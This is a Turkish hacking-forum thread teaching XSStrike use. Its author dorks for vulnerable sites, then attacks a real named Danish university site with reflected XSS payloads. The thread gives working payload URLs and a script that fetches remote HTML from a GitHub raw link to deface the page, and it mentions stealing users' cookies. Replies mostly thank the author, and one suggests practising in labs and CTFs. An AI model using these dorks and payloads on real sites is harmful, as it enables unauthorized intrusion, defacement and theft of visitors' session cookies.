XSStrike Nedir, Nasıl Kullanılır?

Agent-47

Agent-47

Katılımcı Üye
23 Mar 2023
415
266
HACKERİSTAN
Herkese selam dostlar bugün bu konumuzda XSStrike toolunu anlatacağım. Şimdiden okuduğunuz için teşekkürler.

xsstrike-768x422.jpg.webp

İlk önce Toolumuzun kurulumuna geçelim

kali linuxümü açtım. ve /opt klasöründe terminale bu kodu girdim.

1.png


kod:

Kod: 
git clone https://github.com/s0md3v/XSStrike.git;cd XSStrike;python3 xsstrike.py
Kod:

# bunu yazdıktan sonra python3 xsstrike.py yazabilirsiniz.

evet şimdi toolumuzu hazırladığımıza göre xss dork yazalım.

benim kullanacağım dork:

Kod: 
inurl:php?search= site:dk

Screenshot-29.png


Acta Chemica Scandinavica sitesi hedefimiz olsun.

dorkun bu sitede bulduğu link:


Screenshot-32.png

sitede search yapacağımız inputlar var (genelde searchler reflected xss olur) hemen xss deneyelim
klasik xss payloadı:

JavaScript: 
<script>alert(1)</script>

2.png


sonuç:

3.png


(xss açığı var)

şimdi sitede search yaptıktan sonra bize verdiği linkteki yazdığımız payloadı sildikten sonra linki xsstrike'a yönlendirelim. Bu link işinde dikkatli olun doğru linki verdiğinizden emin olun
burayı:

4.png


şimdi sıra XSStrike'ta

indir.png
XSStrike ta sitede xss payloadları denemesi için kısaca şu kodu yazabilirsiniz :)

Kod: 
python3 -u "http://actachemscand.ki.ku.dk/results.php?keywords="

5.png


ve taramayı başlatalım.

6.png


şimdi bir payloadı seçelim

7.png


bunu linkteki keywords= parametresinin yanına yazalım.
yani buraya:

Kod: 
http://actachemscand.ki.ku.dk/results.php?keywords=<details%0aontoggLE%09=%09a=prompt,a()%0dx//

8.png


evet arkadaşlar bu payload siteye ayrıntılar diye bi kutucuk ekliyor bu kutucuğu açınca alert geliyor.

9.png


xsstriketa başka parametreler de var --fuzzer, --crawl gibi isterseniz bunlarıda kullanabilirsiniz.
xss açıklı siteye birçok şey yapabilirsiniz özellikle büyük bir siteyse xss sayesinde birçok kişinin cookiesini çalabilirsiniz.
isterseniz biz xss ile index deneyelim. Ama sitedeki xss zafiyeti reflected türü olduğu için sadece linki kullanan kişilerde görünecektir indexiniz.
neyse
siteye bu payloadı yazıyorsunuz

JavaScript: 
<script>fetch("https://raw.githubusercontent.com/profiliniz/repositoryniz/main/dosyanız").then(response => response.text()).then(html => document.body.innerHTML = html);</script>

ama bundan önce githubda bir repository oluşturun ve bunun içine bir dosya oluşturup içine indexinizin kodlarını yazın ardından raw linkini alın ve https://raw.githubusercontent.com'a raw linkinizi yapıştırın

10.png


ardından enterleyin

11.png


ve index yüklendi :)

eğer stored xss te bunu yaparsanız indexiniz sitede ana sayfa gibi yerlerde görünür. yada zafiyetin bulunduğu sayfada görünür yani linkte görünmez. :)

konumu okuduğunuz için teşekkür ederim :)
 
Son düzenleme:
Agent-47

Agent-47

Katılımcı Üye
23 Mar 2023
415
266
HACKERİSTAN
RUBYEFE' Alıntı:
Ellerine sağlık.
Genişletmek için tıkla ...
teşekkürler
Arenklord' Alıntı:
Eline sağlık agent bunun arka planda nasıl işlediğini de anlatsaydın daha güzel olurdu
Genişletmek için tıkla ...
nasıl yani anlamadım hocam, xsstrike'ın nasıl çalıştığımı, onu diyosanız zaten bu tool payloadları brute force yapıp kontrol ederek çalışmıyor mu
S3SS1Z T3AM' Alıntı:
eline koluna sağlık
Genişletmek için tıkla ...
teşekkürler
Watnea' Alıntı:
eline sağlık güzel konu
Genişletmek için tıkla ...
teşekkürler :)
CH' Alıntı:
Emeklerine sağlık , detaylı ve anlaşılır bir konu olmuş 👍🏻🙂
Genişletmek için tıkla ...
teşekkür ederim :)
1titanik' Alıntı:
(karalama) bakmayın
Genişletmek için tıkla ...
hee :D bakmadın demi oraya :D
 
Gergin Görünüşlü Adam

Gergin Görünüşlü Adam

Üye
7 Ağu 2023
99
55
konu çok basit ve temel seviyenin bile altında geliştirmenizi öneririm
şayet xss temelinde client side bi açık kullanıcı odaklı saldırılar genelde yapılır
attığın index sadece senin browserında çalışır html yönlendirmesi ile bu şekilde servera müdahale edemezsin manuel tespit etmek önceliğiniz olsun bu gibi basit payload ibaresinden olan toolar değil
xssstrike kullanmadan önce
derinlemesine xss ve javascript nedir öğrenmenizi tavsiye ediyorum
ayrıca xss konusunda lab ve ctf çözmenizi tavsiye ederim dork ile bir şeyler denemekten çok daha faydası dokunur
iyi günler dilerim.
 
Agent-47

Agent-47

Katılımcı Üye
23 Mar 2023
415
266
HACKERİSTAN
Gergin Görünüşlü Adam' Alıntı:
konu çok basit ve temel seviyenin bile altında geliştirmenizi öneririm
şayet xss temelinde client side bi açık kullanıcı odaklı saldırılar genelde yapılır
attığın index sadece senin browserında çalışır html yönlendirmesi ile bu şekilde servera müdahale edemezsin manuel tespit etmek önceliğiniz olsun bu gibi basit payload ibaresinden olan toolar değil
xssstrike kullanmadan önce
derinlemesine xss ve javascript nedir öğrenmenizi tavsiye ediyorum
ayrıca xss konusunda lab ve ctf çözmenizi tavsiye ederim dork ile bir şeyler denemekten çok daha faydası dokunur
iyi günler dilerim.
Genişletmek için tıkla ...
Konuyu paylaşmam gerekiyordu en kısa sürede, xsstrike'ın diğer özelliklerinin kullanımını bulamadım bu şekilde paylaştım
xss açığını biliyorum ama ileri düzey değilim attığım İndexin sadece linkte görüneceğini, stored türde inputu verdiğimiz yerde görüneceğini belirtmiştim:
Agent-47' Alıntı:
eğer stored xss te bunu yaparsanız indexiniz sitede ana sayfa gibi yerlerde görünür. yada zafiyetin bulunduğu sayfada görünür yani linkte görünmez
Genişletmek için tıkla ...
Stored açıkta tabiki indeximi basabilirim ve birçok deneyimim var
Dediğim üzere bu toolu ilk kez araştırdım detaylı araştırmak için zamanım yetmicekti ve açıkçası bu tür otomatik toolları pek kullanmam :D
Xss açığınıda aramıyorum önceliğim değil tabiki hedef site de tararım ama dediğim gibi hedef site bulmak için xss dork yazmam sırf konu içindi
Xss güzel bir açık ilerde detaylı, ileri düzey bi şekilde öğrenirim javascriptte öğreneceğim diller arasında yer alıyor zaten
Lab ve ctf pek çözmüyorum ama tavsiyen için teşekkürler
mtzx' Alıntı:
Eline sağlık Agent : )
Genişletmek için tıkla ...
Teşekkür ederim hocam :)
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.